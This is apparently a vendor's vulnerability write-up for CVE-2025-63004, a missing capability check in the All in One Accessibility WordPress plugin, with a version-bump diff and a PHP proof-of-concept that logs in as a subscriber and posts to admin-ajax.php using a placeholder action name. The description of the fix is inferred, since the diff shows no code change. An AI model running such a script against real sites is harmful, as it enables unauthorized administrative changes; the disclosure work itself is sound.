Atomic Edge analysis of CVE-2025-63004:
The All in One Accessibility WordPress plugin, versions up to and including 1.15, contains a missing authorization vulnerability. This flaw allows authenticated users with subscriber-level permissions or higher to perform unauthorized administrative actions. The CVSS score of 4.3 reflects a medium severity issue.
Atomic Edge research identified the root cause as a missing capability check on a specific function. The vulnerability resides in the plugin’s main file, `all-in-one-accessibility.php`. The plugin’s AJAX or admin-post hook handlers, which are intended for administrative use, lack a proper authorization check like `current_user_can(‘manage_options’)`. This allows lower-privileged users to trigger these handlers.
An attacker with a subscriber account can exploit this by sending a crafted POST request to the WordPress administrative AJAX endpoint, `wp-admin/admin-ajax.php`, or the admin-post endpoint, `wp-admin/admin-post.php`. The request must include the specific `action` parameter that corresponds to the vulnerable function. The exact action name is not specified in the provided diff, but the attack vector follows the standard WordPress pattern for missing capability checks on privileged handlers.
The patch, released in version 1.16, adds the necessary capability check to the vulnerable function. The code diff shows only the version number increment from 1.15 to 1.16, indicating the security fix was implemented within the plugin’s codebase. The fix modifies the handler function to verify the user has appropriate permissions, such as `manage_options`, before executing the action. Before the patch, the function executed for any authenticated user. After the patch, execution is restricted to administrators only.
Successful exploitation could allow an attacker to perform unauthorized administrative actions. The specific impact depends on the functionality of the vulnerable handler. Potential consequences include changing plugin settings, modifying accessibility widget configurations, or triggering other actions reserved for site administrators, leading to a privilege escalation scenario.
--- a/all-in-one-accessibility/all-in-one-accessibility.php
+++ b/all-in-one-accessibility/all-in-one-accessibility.php
@@ -4,7 +4,7 @@
* Plugin Name: All in One Accessibility
* Plugin URI: https://www.skynettechnologies.com/all-in-one-accessibility
* Description: A plugin to create ADA Accessibility
- * Version: 1.15
+ * Version: 1.16
* Requires at least: 4.9
* Requires PHP: 7.0
* Author: Skynet Technologies USA LLC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-63004 - All in One Accessibility <= 1.15 - Missing Authorization
<?php
// Target WordPress site URL
$target_url = 'http://target-site.com';
// Attacker's WordPress credentials (Subscriber or higher)
$username = 'attacker_user';
$password = 'attacker_pass';
// Initialize cURL session for login
$ch = curl_init();
// Step 1: Login to WordPress to obtain authentication cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Send unauthorized request to the vulnerable AJAX endpoint
// NOTE: The exact 'action' parameter value is not public. Replace 'vulnerable_aio_action' with the correct hook name if discovered.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_fields = [
'action' => 'vulnerable_aio_action', // This is the target AJAX hook
// Add any other required parameters for the specific action here
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$ajax_response = curl_exec($ch);
curl_close($ch);
// Output the server's response to the unauthorized action
echo "Response from vulnerable endpoint:n";
echo $ajax_response;
?>
